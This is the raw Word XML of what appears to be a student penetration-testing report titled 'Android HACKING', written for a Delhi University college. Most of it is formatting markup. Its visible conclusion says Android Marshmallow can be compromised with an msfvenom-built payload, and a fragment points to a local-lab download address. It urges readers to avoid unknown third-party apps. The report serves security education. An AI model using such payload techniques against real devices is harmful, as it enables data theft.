    <w:p w14:paraId="2D0D2CEC" w14:textId="77777777" w:rsidR="00512225" w:rsidRPr="00871742" w:rsidRDefault="00512225" w:rsidP="00174DAC">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="241DFD5C" w14:textId="481A35C3" w:rsidR="00926C8F" w:rsidRPr="00630833" w:rsidRDefault="00871742" w:rsidP="00871742">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="_Toc148744922"/>
      <w:r w:rsidRPr="00630833">
        <w:rPr>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">4.0 </w:t>
      </w:r>
      <w:r w:rsidR="00926C8F" w:rsidRPr="00630833">
        <w:rPr>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Conclusion</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8"/>
      <w:r w:rsidR="00926C8F" w:rsidRPr="00630833">
        <w:rPr>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="484F8B2C" w14:textId="5CE0F0AE" w:rsidR="00926C8F" w:rsidRPr="00871742" w:rsidRDefault="001F6024" w:rsidP="00421A75">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00871742">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="242424"/>
          <w:spacing w:val="-1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">Android OS Marshmallow can be exploited by payload created by </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00871742">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="242424"/>
          <w:spacing w:val="-1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>msfvenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00871742">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="242424"/>
          <w:spacing w:val="-1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00871742">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="242424"/>
          <w:spacing w:val="-1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Lesson</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00871742">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="242424"/>
          <w:spacing w:val="-1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> we got is never download or install unknown third party apps also before downloading any app check what permissions it is asking for because such malicious apps can </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00871742">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="242424"/>
          <w:spacing w:val="-1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>syn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00871742">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="242424"/>
          <w:spacing w:val="-1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> all your important data. </w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00926C8F" w:rsidRPr="00871742" w:rsidSect="0041260F">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F81E" w14:textId="77777777" w:rsidR="0041260F" w:rsidRDefault="0041260F" w:rsidP="00F14D51">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="57CEB849" w14:textId="77777777" w:rsidR="0041260F" w:rsidRDefault="0041260F" w:rsidP="00F1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CF9" w14:textId="77777777" w:rsidR="00E67EAB" w:rsidRDefault="00E6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2E3B" w14:textId="77777777" w:rsidR="0041260F" w:rsidRDefault="0041260F" w:rsidP="00F14D51">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="5F4FE07E" w14:textId="77777777" w:rsidR="0041260F" w:rsidRDefault="0041260F" w:rsidP="00F14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2367"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F536DAE8"/>
    <w:lvl w:ilvl="0" w:tplc="BC28EA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06B7D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="ADF89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B371DC"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F1A26AEC"/>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num w:numId="1" w16cid:durableId="1728872099">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="605387732">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="33118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234"/>
    <w:rsid w:val="000813B6"/>
    <w:rsid w:val="000C2956"/>
    <w:rsid w:val="000D37AA"/>
    <w:rsid w:val="000E7F21"/>
    <w:rsid w:val="00110504"/>
    <w:rsid w:val="001161BE"/>
    <w:rsid w:val="00117DA6"/>
    <w:rsid w:val="00130D1C"/>
    <w:rsid w:val="00144007"/>
    <w:rsid w:val="00157666"/>
    <w:rsid w:val="00174DAC"/>
    <w:rsid w:val="00185383"/>
    <w:rsid w:val="001F6024"/>
    <w:rsid w:val="00263DC5"/>
    <w:rsid w:val="002B355B"/>
    <w:rsid w:val="002B459D"/>
    <w:rsid w:val="002C524F"/>
    <w:rsid w:val="002F5585"/>
    <w:rsid w:val="003039DB"/>
    <w:rsid w:val="00380197"/>
    <w:rsid w:val="003A298F"/>
    <w:rsid w:val="003B2088"/>
    <w:rsid w:val="003D1508"/>
    <w:rsid w:val="003D3E31"/>
    <w:rsid w:val="003D76B5"/>
    <w:rsid w:val="003E139E"/>
    <w:rsid w:val="003F0C62"/>
    <w:rsid w:val="0041260F"/>
    <w:rsid w:val="00421A75"/>
    <w:rsid w:val="00446153"/>
    <w:rsid w:val="00472460"/>
    <w:rsid w:val="00476234"/>
    <w:rsid w:val="004977F0"/>
    <w:rsid w:val="004B1B1B"/>
    <w:rsid w:val="004E3D8C"/>
    <w:rsid w:val="00512225"/>
    <w:rsid w:val="00537362"/>
    <w:rsid w:val="00555953"/>
    <w:rsid w:val="00577E25"/>
    <w:rsid w:val="005A348E"/>
    <w:rsid w:val="005B1AAB"/>
    <w:rsid w:val="00630833"/>
    <w:rsid w:val="00646893"/>
    <w:rsid w:val="006867E4"/>
    <w:rsid w:val="006B1831"/>
    <w:rsid w:val="0076566D"/>
    <w:rsid w:val="007F0FAF"/>
    <w:rsid w:val="008548F0"/>
    <w:rsid w:val="00871742"/>
    <w:rsid w:val="008877EA"/>
    <w:rsid w:val="0089058F"/>
    <w:rsid w:val="008938A3"/>
    <w:rsid w:val="00896E34"/>
    <w:rsid w:val="008E0CB7"/>
    <w:rsid w:val="008E4026"/>
    <w:rsid w:val="008F20AD"/>
    <w:rsid w:val="00926C8F"/>
    <w:rsid w:val="00942BE1"/>
    <w:rsid w:val="00963FC0"/>
    <w:rsid w:val="009C6B62"/>
    <w:rsid w:val="00A01A9E"/>
    <w:rsid w:val="00A11CEC"/>
    <w:rsid w:val="00A256DB"/>
    <w:rsid w:val="00A472F9"/>
    <w:rsid w:val="00A91C09"/>
    <w:rsid w:val="00AC4344"/>
    <w:rsid w:val="00AC5DB0"/>
    <w:rsid w:val="00AE38E3"/>
    <w:rsid w:val="00AF22C4"/>
    <w:rsid w:val="00B177CA"/>
    <w:rsid w:val="00B3643A"/>
    <w:rsid w:val="00B47B9E"/>
    <w:rsid w:val="00BC6CF3"/>
    <w:rsid w:val="00C207DE"/>
    <w:rsid w:val="00C31873"/>
    <w:rsid w:val="00C74136"/>
    <w:rsid w:val="00D30958"/>
    <w:rsid w:val="00D54EC1"/>
    <w:rsid w:val="00D85761"/>
    <w:rsid w:val="00E0723C"/>
    <w:rsid w:val="00E63EDB"/>
    <w:rsid w:val="00E67EAB"/>
    <w:rsid w:val="00EC3BA5"/>
    <w:rsid w:val="00EE5320"/>
    <w:rsid w:val="00F14D51"/>
    <w:rsid w:val="00F42B16"/>
    <w:rsid w:val="00FF1E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D6944"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{A73B96C9-C778-4A22-A750-ADD1C30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51"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00F14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51"/>
  </w:style>
  <w:style w:type="table" w:styleId="TableGrid">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="TableNormal"/>
    <w:uiPriority w:val="39"/>
    <w:rsid w:val="0013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136"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00BC6CF3"/>
    <w:rPr>
      <w:color w:val="0000FF"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="UnresolvedMention">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00BC6CF3"/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NormalWeb">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="003B20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D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4DAC"/>
    <w:pPr>
      <w:outlineLvl w:val="9"/>
    </w:pPr>
    <w:rPr>
      <w:kern w:val="0"/>
      <w:lang w:val="en-US"/>
      <w14:ligatures w14:val="none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC1">
    <w:name w:val="toc 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00174DAC"/>
    <w:pPr>
      <w:spacing w:after="100"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC2">
    <w:name w:val="toc 2"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00174DAC"/>
    <w:pPr>
      <w:spacing w:after="100"/>
      <w:ind w:left="220"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NoSpacing">
    <w:name w:val="No Spacing"/>
    <w:link w:val="NoSpacingChar"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:rsid w:val="005122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222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9735">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1326978752">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="17470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92.168.1.3/download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17043-23E4-4D9D-89DC-B7B3E780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1</TotalTime>
  <Pages>10</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droid HACKING</vt:lpstr>
    </vt:vector>
  </TitlesOfParts>
  <Company>Prepared for: - COL Delhi Universit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HACKING</dc:title>
  <dc:subject>Penetration Testing Report</dc:subject>
  <dc:creator>Prateek Sharma</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Prateek Sharma</cp:lastModifiedBy>
  <cp:revision>17</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-10-09T13:07:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-04-24T19:46:00Z</dcterms:modified>
</cp:coreProperties>
</file>